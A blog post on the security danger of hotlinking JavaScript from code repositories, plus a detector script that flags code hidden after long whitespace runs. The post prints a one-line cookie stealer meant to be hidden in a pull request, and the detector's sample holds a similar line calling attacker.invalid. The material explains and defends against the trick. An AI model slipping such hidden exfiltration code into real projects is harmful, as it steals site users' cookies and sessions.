
Hotlinking to source code repositories is dangerous for the web

Billy Hoffman from Zoompf wrote a great post titled html5shiv and Serving Content From Code Repositories, which details why you should never ever hotlink to source code repositories, mostly from a performance standpoint. You should definitely read it and then come back here, so we can talk about the security implications of that same sin.

The Open, Irresponsible Web

To put it straight: if you're linking to a JavaScript file hosted on a source code repository, you're putting your site and the web at risk.

[Image: Me, the so-called attacker, preparing an innocent-looking pull request]

I know, you're already hotlinking to tons of third-party static files and snippets such as facebook & twitter, Google Analytics, maybe TypeKit or whatever. They're all large corporations, and if ga.js ever gets compromised, we'll all suffer.

But you and your favorite open-source maintainer are neither facebook nor google. I could get all spooky and convince you that hackers troll web-dev conferences and wait for an opportunity to quickly push malicious changesets from Paul, Remy or Lea's laptops, but that would be foolish. No one would risk an arrest when it's so much easier to abuse good will.

Compromising Open Source Projects

Without any black-hat-base64-encoded-eval'd stuff, let's see how easy it is to compromise any open source project. The idea is simple enough, and I'll focus on GitHub to demonstrate it, but I believe it could work with most platforms.

Anyone can fork GitHub repositories, apply patches and send pull requests to project maintainers. On active open source projects like the ones in our thriving web-dev community, this is part of the routine. So an attacker might write a malicious line like the following:

// Prepend with lots of spaces, preferably after a long line
var stealUrl = ''+encodeURIComponent(location) + encodeURIComponent(document.cookie); var steal = new Image(); steal.src = stealUrl; document.getElementsByTagName('body')[0].appendChild(steal);

The attacker shoves it far past the visible end of a long line that also carries some other, innocent changes. Hidden among innocuous tweaks, possibly spread over several commits, it will slip past most maintainers even if they do review the changes. A major help is that GitHub's pull request preview doesn't use word wrap, which is great for visualizing diffs but also problematic: it's quite easy for a long line like the one above to go unnoticed.

[Image: Surprise! The tiny cookie-thief is peeking, after you thought the line had ended.]

Now, that risk exists even if you never hotlink to source code repositories. But if you do, your site is compromised within merely 180 seconds of the 'infection'. That's right: your users' cookies, and who knows what else, could be stolen three minutes after a third-party project, completely out of your control, gets compromised. How's that for a "Zero Day Exploit"?
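One way to catch this trick before merging is to scan incoming JavaScript for code that starts only after a long run of whitespace on an already-wide line, which is exactly where an unwrapped diff view stops showing it. The following is an added example, not code from the original post or from GitHub; the thresholds (gap, minCol, maxLen), the function name and the sample patch are all assumptions.

```javascript
// Flags lines where visible code is followed by a long whitespace run and then
// more code (the "hidden past the end of the line" trick), and lines so long
// that an unwrapped diff view would scroll them off-screen anyway.
// Thresholds are assumptions; tune them to the project's coding style.
function findHiddenCode(source, { gap = 40, minCol = 100, maxLen = 200 } = {}) {
  const findings = [];
  // group 1: visible prefix, group 2: whitespace run, group 3: trailing code.
  // Requiring a non-space before the run means plain indentation never matches.
  const hidden = new RegExp(`^(.*?\\S)([ \\t]{${gap},})(\\S.*)$`);
  source.split("\n").forEach((line, idx) => {
    const m = hidden.exec(line);
    if (m) {
      const column = m[1].length + m[2].length; // column where hidden code begins
      if (column >= minCol) {
        findings.push({ line: idx + 1, column, kind: "hidden-after-gap",
                        snippet: m[3].slice(0, 60) });
        return;
      }
    }
    if (line.length > maxLen) {
      findings.push({ line: idx + 1, column: maxLen, kind: "overlong",
                      snippet: line.slice(maxLen, maxLen + 60) });
    }
  });
  return findings;
}

// Constructed sample: a harmless-looking patch with a cookie thief like the one
// in the post pushed 240 columns past the visible end of line 3.
const SAMPLE = [
  "function init() {",
  "  var el = document.getElementById('app');",
  "  el.className = 'ready';" + " ".repeat(240) +
    "var s = new Image(); s.src = '//attacker.invalid/?' + encodeURIComponent(document.cookie);",
  "  return el;",
  "}",
].join("\n");

for (const f of findHiddenCode(SAMPLE)) {
  console.log(`line ${f.line} col ${f.column} [${f.kind}]: ${f.snippet}`);
}
```

Run it over the files touched by a pull request (or wire it into a pre-receive hook) and any hit is a line worth reading to its real end before merging.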
